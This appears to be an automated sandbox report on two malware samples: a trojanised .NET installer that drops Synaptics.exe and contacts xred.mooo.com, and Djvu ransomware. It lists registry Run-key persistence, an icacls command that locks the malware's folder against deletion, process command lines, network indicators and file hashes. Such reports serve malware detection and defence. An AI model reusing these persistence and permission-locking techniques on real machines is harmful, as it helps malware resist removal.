| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\b319ec1c324fd5da558d6fda\Setup.exe | N/A |
| N/A | N/A | C:\3b29b07001e8d6eb1d0fc429\Setup.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe
"C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe"
C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\b319ec1c324fd5da558d6fda\Setup.exe
C:\b319ec1c324fd5da558d6fda\\Setup.exe /x86 /x64 /web
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
C:\3b29b07001e8d6eb1d0fc429\Setup.exe
C:\3b29b07001e8d6eb1d0fc429\\Setup.exe InjUpdate /x86 /x64 /web
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 142.250.187.206:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.200.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/4724-0-0x0000000002460000-0x0000000002461000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe
| MD5 | 9e8253f0a993e53b4809dbd74b335227 |
| SHA1 | f6ba6f03c65c3996a258f58324a917463b2d6ff4 |
| SHA256 | e434828818f81e6e1f5955e84caec08662bd154a80b24a71a2eda530d8b2f66a |
| SHA512 | 404d67d59fcd767e65d86395b38d1a531465cee5bb3c5cf3d1205975ff76d27d477fe8cc3842b8134f17b61292d8e2ffba71134fe50a36afd60b189b027f5af0 |
C:\ProgramData\Synaptics\Synaptics.exe
| MD5 | 6eb2b081d12ad12c2ce50da34438651d |
| SHA1 | 2092c0733ec3a3c514568b6009ee53b9d2ad8dc4 |
| SHA256 | 1371b24900cbd474a6bc2804f0e79dbd7b0429368be6190f276db912d73eb104 |
| SHA512 | 881d14d87a7f254292f962181eee79137f612d13994ff4da0eb3d86b0217bcbac39e04778c66d1e4c3df8a5b934cbb6130b43c0d4f3915d5e8471e9314d82c1b |
memory/4724-128-0x0000000000400000-0x00000000005B8000-memory.dmp
memory/4364-129-0x0000000000630000-0x0000000000631000-memory.dmp
C:\b319ec1c324fd5da558d6fda\Setup.exe
| MD5 | 8b3ecf4d59a85dae0960d3175865a06d |
| SHA1 | fc81227ec438adc3f23e03a229a263d26bcf9092 |
| SHA256 | 2b088aefcc76d0baa0bff0843bf458db27bacc47a8e698c9948e53ffc471828b |
| SHA512 | a58a056a3a5814a13153b4c594ed72796b4598f8e715771fc31e60c60a2e26250768b8f36b18675b91e7ecc777ef27c7554f7a0e92c2dfaba74531e669c38263 |
C:\b319ec1c324fd5da558d6fda\SetupEngine.dll
| MD5 | 43bc7b5dfd2e45751d6d2ca7274063e4 |
| SHA1 | a8955033d0e94d33114a1205fe7038c6ae2f54f1 |
| SHA256 | a11af883273ddbd24bfed4a240c43f41ce3d8c7962ec970da2d4c7e13b563d04 |
| SHA512 | 3f3068e660fea932e91e4d141d8202466b72447107ff43f90dea9557fc188696617025531220bc113dc19fdd7adf313a47ac5f2a4ce94c65f9aeb2d7deda7f36 |
C:\b319ec1c324fd5da558d6fda\sqmapi.dll
| MD5 | d475bbd6fef8db2dde0da7ccfd2c9042 |
| SHA1 | 80887bdb64335762a3b1d78f7365c4ee9cfaeab5 |
| SHA256 | 8e9d77a216d8dd2be2b304e60edf85ce825309e67262fcff1891aede63909599 |
| SHA512 | f760e02d4d336ac384a0125291b9deac88c24f457271be686b6d817f01ea046d286c73deddbf0476dcc2ade3b3f5329563abd8f2f1e40aee817fee1e3766d008 |
C:\b319ec1c324fd5da558d6fda\DHTMLHeader.html
| MD5 | cd131d41791a543cc6f6ed1ea5bd257c |
| SHA1 | f42a2708a0b42a13530d26515274d1fcdbfe8490 |
| SHA256 | e139af8858fe90127095ac1c4685bcd849437ef0df7c416033554703f5d864bb |
| SHA512 | a6ee9af8f8c2c7acd58dd3c42b8d70c55202b382ffc5a93772af7bf7d7740c1162bb6d38a4307b1802294a18eb52032d410e128072af7d4f9d54f415be020c9a |
C:\Users\Admin\AppData\Local\Temp\HFIE38B.tmp.html
| MD5 | 5391b49a7168718beb1eb9ed38ba6c57 |
| SHA1 | da1181f4ee162cb24f782515595b6de33c20f589 |
| SHA256 | 1ad512e90754039cf8eb6e20a2b22b3490dc408fd2d920e422f5547054c2cf12 |
| SHA512 | f926fd3ccd7dc6a3a21e608cf0d39c321b89aae5de91dba62f1d57da4a8d7d9922fe762da14410305fbe4a1ab9943ceb33ebda4a9dc7f6311f97d9d519116e6c |
C:\b319ec1c324fd5da558d6fda\ParameterInfo.xml
| MD5 | 4925613d29bc7350130c7076e4c92c1c |
| SHA1 | 2821351d3be08f982431ba789f034b9f028ca922 |
| SHA256 | 9157a0afe34576dfea4ba64db5737867742b4e9346a1f2c149b98b6805d45e31 |
| SHA512 | 3e69650e4101a14ef69f94fa54b02d8d305039165a0bffc519b3cf96f2dcbcf46845e4669d29ccc5ceb887b2f95fc4756265b19d5c17aa176d3d6dc53ed83f77 |
C:\b319ec1c324fd5da558d6fda\1028\LocalizedData.xml
| MD5 | ff41100cc12e45a327d670652f0d6b87 |
| SHA1 | cb53d671cb66d28b6eb7247a1a0c70a114d07e6b |
| SHA256 | ef3de7ab3d80a4d2865b9e191d2311112b4870103d383ae21882f251bbde7f0a |
| SHA512 | f8a2f8db5957a43aa82bd7d193b2ff2a151bba6a9d0ad2d39e120909a0f8939123b389ebb4244a417f9e4d8e46629c49ac193c320231cb614253612af45281a8 |
C:\b319ec1c324fd5da558d6fda\1030\LocalizedData.xml
| MD5 | 53aa67d27c43a35c6f61552ee9865f55 |
| SHA1 | 504035de2fe6432d54bc69f0d126516f363e1905 |
| SHA256 | 5d08b297b867179d8d2ec861dbf7e1dfdb283573430a55644e134ee39083157a |
| SHA512 | 7a284076f6f204e5be41eab3c3abb1983fbbc21669130cc7e6961a7b858f30caf83fbcb2ef44cfe712341ab664347df29d58b650f004608b015e61e4f5d4f47b |
C:\b319ec1c324fd5da558d6fda\1037\LocalizedData.xml
| MD5 | 94f3480d829cee3470d2ba1046f2f613 |
| SHA1 | 9a8ffc781afb5f087b39abe82c11e20d3e08b4f3 |
| SHA256 | eceb759e0f06e5d4f30bc8a982f099c6c268cff4a1459222da794d639c74f97f |
| SHA512 | 436d52da9c6c853616cf088c83b55032e491d6d76eeca0bf0cb40b7a84383a1fcffcb8ac0793cdea6af04d02acf5c1654d6b9461506ee704d95a9469581e8eaf |
C:\b319ec1c324fd5da558d6fda\1036\LocalizedData.xml
| MD5 | 75bf2db655ca2442ae41495e158149c9 |
| SHA1 | 514a48371362dfa2033ba99ecab80727f7e4b0ee |
| SHA256 | 1938c4ffedfbb7fea0636238abb7f8a8db53db62537437ff1ec0e12dca2abfab |
| SHA512 | 1b697d0621f47bb66d45ae85183a02ec78dd2b6458ef2b0897d5bbbd2892e15eaf90384bc351800b5d00cb0c3682db234fac2a75214d8ade4748fc100b1c85b2 |
C:\b319ec1c324fd5da558d6fda\1035\LocalizedData.xml
| MD5 | de5ccb392face873eae6abc827d2d3a7 |
| SHA1 | 50eab784e31d1462a6e760f39751e7e238ba46a2 |
| SHA256 | 6638228cb95fc08eebc9026a2978d5c68852255571941a3828d9948251ca087d |
| SHA512 | b615a69b49404d97ce0459412fbd53415dfbc1792ed95c1f1bd30f963790f3f219e028f559706e8b197ce0223a2c2d9f2e1cac7e3b50372ebef0d050100c6d10 |
C:\b319ec1c324fd5da558d6fda\1032\LocalizedData.xml
| MD5 | 8ecac4ca4cc3405929b06872e3f78e99 |
| SHA1 | 805250d3aa16183dc2801558172633f718a839c4 |
| SHA256 | b9e9740a1f29eeaf213e1e0e01f189b6be1d8d44a2ab6df746eebe9cb772f588 |
| SHA512 | 6f681c35a38a822f4747d6d2bcacefc49a07c9ca28a6b8eed38b8d760327419b5b469698bed37366c2480a4f118d4d36c6ae0f3c645f185e39a90ff26e749062 |
C:\b319ec1c324fd5da558d6fda\1031\LocalizedData.xml
| MD5 | f8e3a846d4aca062413094f1d953075e |
| SHA1 | 09f2aa5b5ef693051862965c7c1063d31623f433 |
| SHA256 | 5a929328125673d922e7f969769b003f5cb6942daa92818a384d50ac755174c2 |
| SHA512 | 95fead89ac87c700615deef0b5c75aa818172cb387fb5e7178d0a96adb4a60abe86c3793f1174ad27b3a12fe29a371682a032d83d2c63f50a223e37a9d5fc7c6 |
C:\b319ec1c324fd5da558d6fda\1033\LocalizedData.xml
| MD5 | 24fde6338ea1a937945c3feb0b7b2281 |
| SHA1 | 6b8b437cd3692207e891e205c246f64e3d81fdd5 |
| SHA256 | 63d37577f760339ed4e40dc699308b25217ce678ce0be50c5f9ce540bb08e0a7 |
| SHA512 | 9a51c7057de4f2ec607bb9820999c676c01c9baf49524011bb5669225d80154119757e8eb92d1952832a6cb20ea0e7da192b4b9ddf813fa4c2780200b3d7ba67 |
C:\b319ec1c324fd5da558d6fda\1025\LocalizedData.xml
| MD5 | d84db0827e0f455f607ef501108557d0 |
| SHA1 | d275924654f617ddaf01b032cf0bf26374fc6cd5 |
| SHA256 | a8d9fd3c7ebb7fee5adb3cafe6190131cebfcbeff7f0046a428c243f78eac559 |
| SHA512 | 1b08115a4ea03217ce7a4d365899bd311a60490b7271db209d1e5979a612d95c853be33d895570e0fb0414ab16eb8fd822fe4e3396019a9edd0d0c7ff9e57232 |
C:\b319ec1c324fd5da558d6fda\SplashScreen.bmp
| MD5 | 0966fcd5a4ab0ddf71f46c01eff3cdd5 |
| SHA1 | 8f4554f079edad23bcd1096e6501a61cf1f8ec34 |
| SHA256 | 31c13ecfc0eb27f34036fb65cc0e735cd444eec75376eea2642f926ac162dcb3 |
| SHA512 | a9e70a2fb5a9899acf086474d71d0e180e2234c40e68bcadb9bf4fe145774680cb55584b39fe53cc75de445c6bf5741fc9b15b18385cbbe20fc595fe0ff86fce |
C:\b319ec1c324fd5da558d6fda\UiInfo.xml
| MD5 | d8f565bd1492ef4a7c4bc26a641cd1ea |
| SHA1 | d4c9c49b47be132944288855dc61dbf8539ec876 |
| SHA256 | 6a0e20df2075c9a58b870233509321372e283ccccc6afaa886e12ba377546e64 |
| SHA512 | ecf57cc6f3f8c4b677246a451ad71835438d587fadc12d95ef1605eb9287b120068938576da95c10edc6d1d033b5968333a5f8b25ce97ecd347a42716cd2a102 |
C:\b319ec1c324fd5da558d6fda\1029\LocalizedData.xml
| MD5 | 51130f3479df72fe12b05a7aba1891d3 |
| SHA1 | fbaf9c0269d532a3ce00d725cd40772bc0ad8f09 |
| SHA256 | 8845d0f0fadfdf51b540d389bbb0a8a9655cf65055e55dcd54fa655576dd70a1 |
| SHA512 | b641e22b81babbde85a6f324851d35f47bd769fc0cff74911010ae620cf682f9c7bc4d946d2f80a46a9851f3cc912625991c8a3876f1d958ea4d49d8791d1815 |
C:\b319ec1c324fd5da558d6fda\1041\LocalizedData.xml
| MD5 | 5ab13768b6c897eff96e35f91b834d25 |
| SHA1 | 54f04c73a57a409e4c1fe317a825ee2ed4ddcd10 |
| SHA256 | 87b5ce86b0134ea82215dcf04ffbf7f5c8a570f814f82b4c7ba6106195924c6b |
| SHA512 | ee98f34723a1593ef12589ea9657f8d9a3c9dc8a3fb5eed6f8bb026c6656a3ca6fec8243745ed7fbf406019b6e2b42762c1ee74d26c0f70cc9da272291fe680f |
C:\b319ec1c324fd5da558d6fda\1044\LocalizedData.xml
| MD5 | a459afdbe20f5d4c904d3e3700ee9191 |
| SHA1 | 22570b1de34c11796390057537269145a2c63438 |
| SHA256 | 0ac4bcf5cee39ad42070e34393303ffe3ef27e71c8d9522f3dc01e12f93dda03 |
| SHA512 | b01536c774121ba9fe25014bb802b45449ba46529af8ad59f3ff93e339e7443238b268716ac051d24ac9eba093e5d66fd5c5faa2ca17bf744ec31e50627159ce |
C:\b319ec1c324fd5da558d6fda\1043\LocalizedData.xml
| MD5 | 898d2a1a5fac4d1a028aa11e0ed9f9b4 |
| SHA1 | 343795fbc1bbf1b0982dc9e70501721433fba892 |
| SHA256 | 73130da9b103f1812ca69cfffdf5750e74b0228cd40e0325a7f14e799aaf21a3 |
| SHA512 | fac3fd81d803c1029df6a3cd93060c950b0ba399fe074d438c4867d55468e7de9aa77bbd7b51fe866f6849684408c853d70956e94de39d4f61019825028a25e4 |
C:\b319ec1c324fd5da558d6fda\1042\LocalizedData.xml
| MD5 | ad25367f86144f29946df3b3866e7dbe |
| SHA1 | cc8470dbe0bfe9394742d639d9caeec961a27928 |
| SHA256 | 90d0885f929059358fe76e61b560b3d188abbe7c041babefc82038f6faebb7eb |
| SHA512 | 66a343d1405e377bf2d303b0ec896814a46248c05dfe61a2c3167ed1c915964f7f57b335bd7fae324461e65e5ee6bc2384eff28f71c4325eb3c4f89611659afb |
C:\b319ec1c324fd5da558d6fda\1038\LocalizedData.xml
| MD5 | 818e35b3eb2e23785decef4e58d74433 |
| SHA1 | 41b43d0b3f81a3a294aa941279a96f0764761547 |
| SHA256 | 3d8b2c8079cf8117340a8fc363dceb9be102d6eb1a72881b0c43e1e4b934303e |
| SHA512 | 98ae09da1be0ebe609d0e11d868258ab322cdc631e3105296c8ce243d821b415f3c487cbb4cd366bb4bdb7f0f9447a25836e53320b424a9ff817cac728ff4ae2 |
C:\b319ec1c324fd5da558d6fda\1040\LocalizedData.xml
| MD5 | 5e805353cb010fc22f51c1f15b8bcaa1 |
| SHA1 | 9360f229aee4fed6897d4f9f239072aa22d6da9e |
| SHA256 | 02b83ebd2689e22668a5ee55a213091fdc090dfee42c0be9386f530d48af8950 |
| SHA512 | 275d7c7c952a352417fe896c5be07f5a4c50ff51569cb04ab615cda6a880a8e83f651c87f226a1eb79d8286f777488bfaac2636a1a2057cf5db83037b3e1214f |
C:\b319ec1c324fd5da558d6fda\1045\LocalizedData.xml
| MD5 | 95c6472f2c8329ec1c10f7df3a31c154 |
| SHA1 | 624d46235912dc169913ba77caa7889219e2c394 |
| SHA256 | 197722527d1ad65a10a29ecec04f029abc549eb5d05bc07a68107ad6dd4bd35b |
| SHA512 | 28149ab0c041dc35f717435f3c2218700090fc38723219c1cd40ec7f777c68d99dd08b6a42014ead8fb1e309637b6c33aa5dec0518dc1b72273c7a6fd7ef06c0 |
C:\b319ec1c324fd5da558d6fda\1049\LocalizedData.xml
| MD5 | 1c8ad8f7aacde7ac59bfd9730cfcae80 |
| SHA1 | 815c79113429b37d34c7ddff46ceccfe58b4cddc |
| SHA256 | 4faa58922f623685f05386ce518c0243e3f310db5ac64c58e5b4e91a3e4477b7 |
| SHA512 | 27d5871f862756945c66397d539c79bf6032ec0d6a06255ad6b57ad1df3c1e8c87dc55dcc3febfb4bd1ce4eb24f3268fab30b1df3fd1c035d66410337db73785 |
C:\b319ec1c324fd5da558d6fda\3082\LocalizedData.xml
| MD5 | e58efac53fe2a16be9b99d0aa33baa3d |
| SHA1 | 7f2fecb6c4ebe9374a04f374d43465d968b3e33f |
| SHA256 | 64baa04b7ebb5ee833f43493497e99a6f2584bdc763a7c24700693cb89b35a0c |
| SHA512 | b9b2e07e845e6bb509d4471cbe3c848836938e507308293f7c083c54cef61911a06110a5616c216ec72c39ce887b2e7f5961688809a2dad787d131ef2780d22e |
C:\b319ec1c324fd5da558d6fda\2070\LocalizedData.xml
| MD5 | 6930ce4e8e28f54a0db5d919b6babd0e |
| SHA1 | 0278bf717168c061709e60ca754c8dc6e32b92d1 |
| SHA256 | 4bbb7f8a9743a5a21711156dc978dc8683b3edcd9ca32e4c6a38dbe6f5001e04 |
| SHA512 | 904dc390c6cad81e60159683fadc5e8556585b32f1f9482accfedf3ee6b14cd8240e2225e3ce8a0338da93162cef601c4e9798327a1bc390e62b4eb2fc59cd4c |
C:\b319ec1c324fd5da558d6fda\2052\LocalizedData.xml
| MD5 | 759eb338d738ca6c531b9d5b06591b3b |
| SHA1 | c9ed5ada615ccacd887a0d07ee25dfe1d7fbc00c |
| SHA256 | a4c3bc545fc028935ad6ec4bd8ce51a300fab8a0b128cca89a8c14923d437b16 |
| SHA512 | 82e6b969dedfdda477f6fb7fcb50a0acad0b26b9b4cca9f1adab5323c6c144da6c0bff34e39e0ef7b39f37ab5808f0064eace99867f7cd258e91aeb5aa5baef2 |
C:\b319ec1c324fd5da558d6fda\1055\LocalizedData.xml
| MD5 | ddb64b6c4fc498c27d291edaaf65a536 |
| SHA1 | e312eef1e9a485c5c6fe4578bbe1dd0cadbb1e3e |
| SHA256 | 027180d93ceb875227a1d76a018b870cd1d09e143ffa1632b31c322b92dd6a35 |
| SHA512 | ddb55169000052fb27caeeb349939925c7df1535c5c697da7cc2be3224c2c8ebe64328d865d1dfdbad4c1e0588853c5309e31de747f71b7f3bc9b6a9eb4335c1 |
C:\b319ec1c324fd5da558d6fda\1053\LocalizedData.xml
| MD5 | 984229d90d2e75f49cd9de5df014e484 |
| SHA1 | fc32854972f189305a38c11a62ef457cd94026c6 |
| SHA256 | c884f515f337e977d4cf1a19ff693c753813ede2e52a9dbe8f6ef25184ccae8d |
| SHA512 | 23101cc1b6c17f10a8d53c59c4e9bf6d24d03d781fa1a36fcb89315f2257ea4a1bd652bdbc81845479a88f00f1db52b35a0bba311a9885c7503689f9c25e49c2 |
C:\b319ec1c324fd5da558d6fda\1046\LocalizedData.xml
| MD5 | c13b50e2a7f6e7e9343500771cf2d247 |
| SHA1 | 0b679d20dda94224a5ddd80863a2a32de1cc6f1e |
| SHA256 | 3f9bf4eee9ece4a0181ea344344230d73d711aba2fa9248834e3b7547a3062cf |
| SHA512 | 32daea597a34f60ca5b73648d66663e4723c0d588af4ce08f76240aabbecd3a35abfbfd5e22abd8eac8ca64a9f2b3edadb8d1c24bc31f53ce5cd902dba3fc5da |
memory/4364-671-0x0000000000630000-0x0000000000631000-memory.dmp
memory/4364-670-0x0000000000400000-0x00000000005B8000-memory.dmp
memory/3944-743-0x00007FF800230000-0x00007FF800240000-memory.dmp
memory/3944-742-0x00007FF800230000-0x00007FF800240000-memory.dmp
memory/3944-744-0x00007FF800230000-0x00007FF800240000-memory.dmp
memory/3944-741-0x00007FF800230000-0x00007FF800240000-memory.dmp
memory/3944-740-0x00007FF800230000-0x00007FF800240000-memory.dmp
memory/3944-745-0x00007FF7FDD30000-0x00007FF7FDD40000-memory.dmp
memory/3944-746-0x00007FF7FDD30000-0x00007FF7FDD40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\D8285E00
| MD5 | b437065823bd6276112855358fff6cfe |
| SHA1 | cf15a34e5be2fa44e2e56582615d7cff9483ce52 |
| SHA256 | dae36560a9b52654fd2d1ed6f535798d598aed0dd7f903a3a7241b4441eb5ca6 |
| SHA512 | f97c8db16d11aa909adadb6ca516417a618c9c97b0654317005d96c8d47d6fe63ecf8b6128b3b66b842425ad42fa153af26aad257de801550b138f4ea088d4a2 |
memory/4364-791-0x0000000000400000-0x00000000005B8000-memory.dmp
memory/4364-795-0x0000000000400000-0x00000000005B8000-memory.dmp
memory/4364-818-0x0000000000400000-0x00000000005B8000-memory.dmp
memory/4364-825-0x0000000000400000-0x00000000005B8000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
141s
Max time network
150s
Command Line
Signatures
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Djvu family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7a476725-87dd-470e-896f-17a56effaee5\\starticon3.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\starticon3.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1792 wrote to memory of 2304 | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1792 wrote to memory of 2304 | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1792 wrote to memory of 2304 | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | C:\Windows\SysWOW64\icacls.exe |
| PID 1792 wrote to memory of 4432 | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | C:\Users\Admin\AppData\Local\Temp\starticon3.exe |
| PID 1792 wrote to memory of 4432 | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | C:\Users\Admin\AppData\Local\Temp\starticon3.exe |
| PID 1792 wrote to memory of 4432 | N/A | C:\Users\Admin\AppData\Local\Temp\starticon3.exe | C:\Users\Admin\AppData\Local\Temp\starticon3.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\starticon3.exe
"C:\Users\Admin\AppData\Local\Temp\starticon3.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\7a476725-87dd-470e-896f-17a56effaee5" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\starticon3.exe
"C:\Users\Admin\AppData\Local\Temp\starticon3.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1792 -ip 1792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 2144
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
